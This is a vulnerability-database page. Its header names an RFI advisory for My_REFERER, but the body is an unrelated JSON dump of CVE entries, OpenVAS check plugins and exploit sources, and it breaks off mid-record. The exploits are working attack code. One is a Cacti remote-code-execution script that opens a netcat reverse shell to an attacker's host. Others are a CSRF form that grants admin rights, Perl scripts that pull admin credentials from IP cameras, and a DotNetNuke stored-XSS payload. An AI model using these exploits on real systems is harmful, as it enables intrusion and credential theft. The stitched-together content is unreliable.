ID SECURITYVULNS:DOC:17846 Type securityvulns Reporter Securityvulns Modified 2007-08-21T00:00:00
Description
App Name : My_REFERER v.1.08
HomePage : http://www.phoenix.frihost.net/referer/readme.php
Vuln type : Remote File Include (RFI)
Vulnerability Discovered by : iNs
{"cve": [{"lastseen": "2020-02-29T13:12:22", "bulletinFamily": "NVD", "description": "Background For regular, unencrypted FTP traffic, the FTP ALG can inspect the unencrypted control channel and open related sessions for the FTP data channel. These related sessions (gates) are specific to source and destination IPs and ports of client and server. The design intent of the ftps-extensions option (which is disabled by default) is to provide similar functionality when the SRX secures the FTP/FTPS client. As the control channel is encrypted, the FTP ALG cannot inspect the port specific information and will open a wider TCP data channel (gate) from client IP to server IP on all destination TCP ports. In FTP/FTPS client environments to an enterprise network or the Internet, this is the desired behavior as it allows firewall policy to be written to FTP/FTPS servers on well-known control ports without using a policy with destination IP ANY and destination port ANY. Issue The ftps-extensions option is not intended or recommended where the SRX secures the FTPS server, as the wide data channel session (gate) will allow the FTPS client temporary access to all TCP ports on the FTPS server. The data session is associated to the control channel and will be closed when the control channel session closes. Depending on the configuration of the FTPS server, supporting load-balancer, and SRX inactivity-timeout values, the server/load-balancer and SRX may keep the control channel open for an extended period of time, allowing an FTPS client access for an equal duration.\u200b Note that the ftps-extensions option is not enabled by default.", "modified": "2020-02-28T23:15:00", "id": "CVE-2015-5361", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5361", "published": "2020-02-28T23:15:00", "title": "CVE-2015-5361", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-27T13:45:24", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketWatcher.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.21, 3.1.x before 3.1.17, and 3.2.x before 3.2.8 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-26T19:33:00", "id": "CVE-2013-4088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4088", "published": "2020-02-21T16:15:00", "title": "CVE-2013-4088", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2020-02-27T13:45:23", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketPhone.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.20, 3.1.x before 3.1.16, and 3.2.x before 3.2.7, and OTRS ITSM 3.0.x before 3.0.8, 3.1.x before 3.1.9, and 3.2.x before 3.2.5 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-26T19:34:00", "id": "CVE-2013-3551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3551", "published": "2020-02-21T16:15:00", "title": "CVE-2013-3551", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2020-02-27T13:41:09", "bulletinFamily": "NVD", "description": "The CGIHTTPServer module in Python 2.7.5 and 3.3.4 does not properly handle URLs in which URL encoding is used for path separators, which allows remote attackers to read script source code or conduct directory traversal attacks and execute unintended code via a crafted character sequence, as demonstrated by a %2f separator.", "modified": "2020-02-26T13:49:00", "id": "CVE-2014-4650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4650", "published": "2020-02-20T17:15:00", "title": "CVE-2014-4650", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-26T12:48:49", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in the Android debug bridge (aka adb) in Android 4.0.4 allows physically proximate attackers with a direct connection to the target Android device to write to arbitrary files owned by system via a .. (dot dot) in the tar archive headers.", "modified": "2020-02-25T19:11:00", "id": "CVE-2014-7951", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7951", "published": "2020-02-20T16:15:00", "title": "CVE-2014-7951", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-29T13:12:19", "bulletinFamily": "NVD", "description": "The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in FreeBSD through 10.1 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message.", "modified": "2020-02-28T16:22:00", "id": "CVE-2015-2923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2923", "published": "2020-02-20T04:15:00", "title": "CVE-2015-2923", "type": "cve", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-29T13:16:18", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the __dn_expand function in network/dn_expand.c in musl libc 1.1x before 1.1.2 and 0.9.13 through 1.0.3 allow remote attackers to (1) have unspecified impact via an invalid name length in a DNS response or (2) cause a denial of service (crash) via an invalid name length in a DNS response, related to an infinite loop with no output.", "modified": "2020-02-28T21:14:00", "id": "CVE-2014-3484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3484", "published": "2020-02-20T04:15:00", "title": "CVE-2014-3484", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-29T13:12:24", "bulletinFamily": "NVD", "description": "Buffer overflow in the afReadFrames function in audiofile (aka libaudiofile and Audio File Library) allows user-assisted remote attackers to cause a denial of service (program crash) or possibly execute arbitrary code via a crafted audio file, as demonstrated by sixteen-stereo-to-eight-mono.c.", "modified": "2020-02-28T20:33:00", "id": "CVE-2015-7747", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7747", "published": "2020-02-19T21:15:00", "title": "CVE-2015-7747", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-29T13:13:38", "bulletinFamily": "NVD", "description": "OverlayFS in the Linux kernel before 3.0.0-16.28, as used in Ubuntu 10.0.4 LTS and 11.10, is missing inode security checks which could allow attackers to bypass security restrictions and perform unauthorized actions.", "modified": "2020-02-28T14:33:00", "id": "CVE-2012-0055", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0055", "published": "2020-02-19T18:15:00", "title": "CVE-2012-0055", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-20T13:38:02", "bulletinFamily": "NVD", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", "modified": "2020-02-19T15:15:00", "published": "2020-02-19T15:15:00", "id": "CVE-2013-5581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5581", "title": "CVE-2013-5581", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2020-02-27T21:08:18", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-02-27T00:00:00", "published": "2020-02-27T00:00:00", "id": "1337DAY-ID-34030", "href": "https://0day.today/exploit/description/34030", "title": "Cacti 1.2.8 - Unauthenticated Remote Code Execution Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python3\r\n\r\n# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution\r\n# Exploit Author: Askar (@mohammadaskar2)\r\n# CVE: CVE-2020-8813\r\n# Vendor Homepage: https://cacti.net/\r\n# Version: v1.2.8\r\n# Tested on: CentOS 7.3 / PHP 7.1.33\r\n\r\nimport requests\r\nimport sys\r\nimport warnings\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import quote\r\n\r\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module='bs4')\r\n\r\n\r\nif len(sys.argv) != 4:\r\n print(\"[~] Usage : ./Cacti-exploit.py url ip port\")\r\n exit()\r\n\r\nurl = sys.argv[1]\r\nip = sys.argv[2]\r\nport = sys.argv[3]\r\n\r\ndef send_exploit(url):\r\n payload = \";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s\" % (ip, port)\r\n cookies = {'Cacti': quote(payload)}\r\n path = url+\"/graph_realtime.php?action=init\"\r\n req = requests.get(path)\r\n if req.status_code == 200 and \"poller_realtime.php\" in req.text:\r\n print(\"[+] File Found and Guest is enabled!\")\r\n print(\"[+] Sending malicous request, check your nc ;)\")\r\n requests.get(path, cookies=cookies)\r\n else:\r\n print(\"[+] Error while requesting the file!\")\r\n\r\nsend_exploit(url)\n\n# 0day.today [2020-02-27] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34030"}, {"lastseen": "2020-02-27T21:08:25", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2020-02-27T00:00:00", "published": "2020-02-27T00:00:00", "id": "1337DAY-ID-34026", "href": "https://0day.today/exploit/description/34026", "title": "Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin) Exploit", "type": "zdt", "sourceData": "# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)\r\n# Description: Operator Can Change Role User Type to admin\r\n# Exploit Author: Meisam Monsef\r\n# Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php\r\n# Version: V-1.0\r\n# Tested on: ubuntu\r\n\r\nExploit :\r\n1 - please login or create account\r\n2 - open exploit.html in browser\r\n3 - change you user id input for Change Role User Type to admin\r\n4 - fill input data (fname - lname - email)\r\n5 - click Update Button\r\n6 - logout account\r\n7 - login again you are admin & Enjoying\r\n\r\n<form action=\"https://TARGET/admin/user/users/create\"\r\nenctype=\"multipart/form-data\" method=\"post\" accept-charset=\"utf-8\">\r\nuser_id :\r\n<input type=\"text\" name=\"user_id\" value=\"1\"> <!-- change your user_id -->\r\n<br>\r\nfname :\r\n<input type=\"text\" name=\"fname\" value=\"\" /> <!-- fill your first name -->\r\n<br>\r\nlname :\r\n<input type=\"text\" name=\"lname\" value=\"\" /> <!-- fill your last name -->\r\n<br>\r\nemail :\r\n<input type=\"text\" name=\"email\" value=\"\" /> <!-- fill your email -->\r\n<br>\r\nuser_type :\r\n<input type=\"text\" name=\"user_type\" value=\"1\" />\r\n<br>\r\nstatus :\r\n<input type=\"text\" name=\"status\" value=\"1\" />\r\n<br>\r\n<button type=\"submit\">Update</button>\r\n</form>\n\n# 0day.today [2020-02-27] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34026"}, {"lastseen": "2020-02-27T01:04:37", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "1337DAY-ID-34013", "href": "https://0day.today/exploit/description/34013", "title": "Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure\r\n# Author: Todor Donev\r\n# Date: 2020-02-23\r\n# Vendor: https://acesecurity.jp\r\n# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113\r\n# CVE: N/A\r\n\r\n#!/usr/bin/perl\r\n#\r\n# ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\r\n#\r\n# Copyright 2020 (c) Todor Donev\r\n#\r\n# https://donev.eu/\r\n#\r\n# Disclaimer:\r\n# This or previous programs are for Educational purpose ONLY. Do not use it without permission. \r\n# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages \r\n# caused by direct or indirect use of the information or functionality provided by these programs. \r\n# The author or any Internet provider bears NO responsibility for content or misuse of these programs \r\n# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, \r\n# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's \r\n# responsibility.\r\n# \r\n# Use them at your own risk! \r\n# \r\n# (Dont do anything without permissions)\r\n#\r\n#\t[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\r\n#\t[ ================================================================\r\n#\t[ Exploit Author: Todor Donev 2020 <[email\u00a0protected]>\r\n#\t[ Initializing the browser\r\n#\t[ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)\r\n#\t[ >> Content-Type => application/x-www-form-urlencoded\r\n#\t[ << Connection => close\r\n#\t[ << Date => Sat, 22 Feb 2020 14:10:01 GMT\r\n#\t[ << Accept-Ranges => bytes\r\n#\t[ << Server => thttpd/2.25b 29dec2003\r\n#\t[ << Content-Length => 25893\r\n#\t[ << Content-Type => application/octet-stream\r\n#\t[ << Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT\r\n#\t[ << Client-Date => Sat, 22 Feb 2020 14:10:04 GMT\r\n#\t[ << Client-Peer => 192.168.200.49:8080\r\n#\t[ << Client-Response-Num => 1\r\n#\t[ \r\n#\t[ Username : admin\r\n#\t[ Password : admin\r\n\r\nuse strict;\r\nuse HTTP::Request;\r\nuse LWP::UserAgent;\r\nuse WWW::UserAgent::Random;\r\nuse Gzip::Faster 'gunzip';\r\n\r\nmy $host = shift || ''; # Full path url to the store\r\nmy $cmd = shift || ''; # show - Show configuration dump\r\n$host =~ s/\\/$//;\r\nprint \"\\033[2J\"; #clear the screen\r\nprint \"\\033[0;0H\"; #jump to 0,0\r\nprint \"[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\\n\";\r\nprint \"[ ================================================================\\n\";\r\nprint \"[ Exploit Author: Todor Donev 2020 <todor.donev\\@gmail.com>\\n\";\r\nif ($host !~ m/^http/){ \r\n print \"[ Usage, Password Disclosure: perl $0 https://target:port/\\n\";\r\n print \"[ Usage, Show Configuration : perl $0 https://target:port/ show\\n\";\r\n exit;\r\n}\r\nprint \"[ Initializing the browser\\n\";\r\nmy $user_agent = rand_ua(\"browsers\");\r\nmy $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });\r\n $browser->timeout(30);\r\n $browser->agent($user_agent);\r\n# my $target = $host.\"/config_backup.bin\";\r\n# my $target = $host.\"/tmpfs/config_backup.bin\";\r\nmy $target = $host.\"\\x2f\\x77\\x65\\x62\\x2f\\x63\\x67\\x69\\x2d\\x62\\x69\\x6e\\x2f\\x68\\x69\\x33\\x35\\x31\\x30\\x2f\\x62\\x61\\x63\\x6b\\x75\\x70\\x2e\\x63\\x67\\x69\";\r\nmy $request = HTTP::Request->new (GET => $target,[Content_Type => \"application/x-www-form-urlencoded\"]); \r\nmy $response = $browser->request($request) or die \"[ Exploit Failed: $!\";\r\nprint \"[ >> $_ => \", $request->header($_), \"\\n\" for $request->header_field_names;\r\nprint \"[ << $_ => \", $response->header($_), \"\\n\" for $response->header_field_names;\r\nprint \"[ Exploit failed! Not vulnerable.\\n\" and exit if ($response->code ne 200);\r\nmy $gzipped = $response->content();\r\nmy $config = gunzip($gzipped);\r\nprint \"[ \\n\";\r\nif ($cmd =~ /show/) {\r\n print \"[ >> Configuration dump...\\n[\\n\";\r\n print \"[ \", $_, \"\\n\" for split(/\\n/,$config);\r\n exit;\r\n} else {\r\n print \"[ Username : \", $1, \"\\n\" if ($config =~ /username=(.*)/);\r\n print \"[ Password : \", $1, \"\\n\" if ($config =~ /password=(.*)/);\r\n exit;\r\n}\n\n# 0day.today [2020-02-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34013"}, {"lastseen": "2020-02-25T01:08:31", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "1337DAY-ID-33998", "href": "https://0day.today/exploit/description/33998", "title": "ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure Vulnerability", "type": "zdt", "sourceData": "# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure\r\n# Author: Todor Donev\r\n# Vendor: www.escam.cn\r\n# Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en\r\n# CVE: N/A\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n# ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\r\n#\r\n# Copyright 2020 (c) Todor Donev\r\n#\r\n# https://donev.eu/\r\n#\r\n# Disclaimer:\r\n# This or previous programs are for Educational purpose ONLY. Do not use it without permission. \r\n# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages \r\n# caused by direct or indirect use of the information or functionality provided by these programs. \r\n# The author or any Internet provider bears NO responsibility for content or misuse of these programs \r\n# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, \r\n# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's \r\n# responsibility.\r\n# \r\n# Use them at your own risk! \r\n# \r\n# (Dont do anything without permissions)\r\n#\r\n#\t[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\r\n#\t[ ===========================================================\r\n#\t[ Exploit Author: Todor Donev 2020 <[email\u00a0protected]>\r\n#\t[ Initializing the browser\r\n#\t[ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8\r\n#\t[ >> Content-Type => application/x-www-form-urlencoded\r\n#\t[ << Connection => close\r\n#\t[ << Date => Fri, 21 Feb 2020 20:23:56 GMT\r\n#\t[ << Accept-Ranges => bytes\r\n#\t[ << Server => thttpd/2.25b 29dec2003\r\n#\t[ << Content-Length => 25003\r\n#\t[ << Content-Type => application/octet-stream\r\n#\t[ << Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT\r\n#\t[ << Client-Date => Fri, 21 Feb 2020 20:23:57 GMT\r\n#\t[ << Client-Peer => 192.168.1.105:8000\r\n#\t[ << Client-Response-Num => 1\r\n#\t[ \r\n#\t[ Username : admin\r\n#\t[ Password : admin\r\n\r\nuse strict;\r\nuse HTTP::Request;\r\nuse LWP::UserAgent;\r\nuse WWW::UserAgent::Random;\r\nuse Gzip::Faster 'gunzip';\r\n\r\nmy $host = shift || ''; # Full path url to the store\r\nmy $cmd = shift || ''; # show - Show configuration dump\r\n$host =~ s/\\/$//;\r\nprint \"\\033[2J\"; #clear the screen\r\nprint \"\\033[0;0H\"; #jump to 0,0\r\nprint \"[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\\n\";\r\nprint \"[ ===========================================================\\n\";\r\nprint \"[ Exploit Author: Todor Donev 2020 <todor.donev\\@gmail.com>\\n\";\r\nif ($host !~ m/^http/){ \r\n print \"[ Usage, Password Disclosure: perl $0 https://target:port/\\n\";\r\n print \"[ Usage, Show Configuration : perl $0 https://target:port/ show\\n\";\r\n exit;\r\n}\r\nprint \"[ Initializing the browser\\n\";\r\nmy $user_agent = rand_ua(\"browsers\");\r\nmy $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });\r\n $browser->timeout(30);\r\n $browser->agent($user_agent);\r\n# my $target = $host.\"/tmpfs/config_backup.bin\";\r\nmy $target = $host.\"\\x2f\\x77\\x65\\x62\\x2f\\x63\\x67\\x69\\x2d\\x62\\x69\\x6e\\x2f\\x68\\x69\\x33\\x35\\x31\\x30\\x2f\\x62\\x61\\x63\\x6b\\x75\\x70\\x2e\\x63\\x67\\x69\";\r\nmy $request = HTTP::Request->new (GET => $target,[Content_Type => \"application/x-www-form-urlencoded\"]); \r\nmy $response = $browser->request($request) or die \"[ Exploit Failed: $!\";\r\nprint \"[ >> $_ => \", $request->header($_), \"\\n\" for $request->header_field_names;\r\nprint \"[ << $_ => \", $response->header($_), \"\\n\" for $response->header_field_names;\r\nprint \"[ Exploit failed! Not vulnerable.\\n\" and exit if ($response->code ne 200);\r\nmy $gzipped = $response->content();\r\nmy $config = gunzip($gzipped);\r\nprint \"[ \\n\";\r\nif ($cmd =~ /show/) {\r\n print \"[ >> Configuration dump...\\n[\\n\";\r\n print \"[ \", $_, \"\\n\" for split(/\\n/,$config);\r\n exit;\r\n} else {\r\n print \"[ Username : \", $1, \"\\n\" if ($config =~ /username=(.*)/);\r\n print \"[ Password : \", $1, \"\\n\" if ($config =~ /password=(.*)/);\r\n exit;\r\n}\n\n# 0day.today [2020-02-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33998"}, {"lastseen": "2020-02-27T01:04:34", "bulletinFamily": "exploit", "description": "Exploit for asp platform in category web applications", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "1337DAY-ID-34011", "href": "https://0day.today/exploit/description/34011", "title": "DotNetNuke 9.5 - Persistent Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting\r\n# Exploit Author: Sajjad Pourali\r\n# Vendor Homepage: http://dnnsoftware.com/\r\n# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip\r\n# Version: <= 9.5\r\n# CVE : N/A\r\n# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175\r\n\r\nDNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the user\u2019s browser.\r\n\r\nIn XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is \u201chttp://www.w3.org/1999/xhtml\u201d which permits us to run XHTML tags such as <script>.\r\n\r\nFor instance, uploading the following code as an XML file executes javascript and shows a non-harmful \u2018XSS\u2019 alert.\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<script xmlns=\"http://www.w3.org/1999/xhtml\">\r\n alert('XSS');\r\n</script>\r\n\r\nThough stealing of authentication cookies are not possible at this time (because the authentication\u2019s cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users\u2019 cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading \u201caspx\u201d extension files through settings page which leads to upload of backdoor files.\n\n# 0day.today [2020-02-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34011"}], "openvas": [{"lastseen": "2020-02-26T16:44:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201114", "title": "Huawei EulerOS: Security Advisory for libgcrypt (EulerOS-SA-2020-1114)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1114\");\n script_version(\"2020-02-24T09:06:45+0000\");\n script_cve_id(\"CVE-2015-0837\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:45 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:45 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libgcrypt (EulerOS-SA-2020-1114)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1114\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1114\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libgcrypt' package(s) announced via the EulerOS-SA-2020-1114 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The mpi_powm function in Libgcrypt before 1.6.3 and GnuPG before 1.4.19 allows attackers to obtain sensitive information by leveraging timing differences when accessing a pre-computed table during modular exponentiation, related to a 'Last-Level Cache Side-Channel Attack.'(CVE-2015-0837)\");\n\n script_tag(name:\"affected\", value:\"'libgcrypt' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libgcrypt\", rpm:\"libgcrypt~1.5.3~14.h4.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgcrypt-devel\", rpm:\"libgcrypt-devel~1.5.3~14.h4.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-02-26T16:44:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201115", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201115", "title": "Huawei EulerOS: Security Advisory for libjpeg-turbo (EulerOS-SA-2020-1115)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1115\");\n script_version(\"2020-02-24T09:06:46+0000\");\n script_cve_id(\"CVE-2014-9092\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:46 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:46 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libjpeg-turbo (EulerOS-SA-2020-1115)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1115\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1115\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libjpeg-turbo' package(s) announced via the EulerOS-SA-2020-1115 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"libjpeg-turbo before 1.3.1 allows remote attackers to cause a denial of service (crash) via a crafted JPEG file, related to the Exif marker.(CVE-2014-9092)\");\n\n script_tag(name:\"affected\", value:\"'libjpeg-turbo' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n 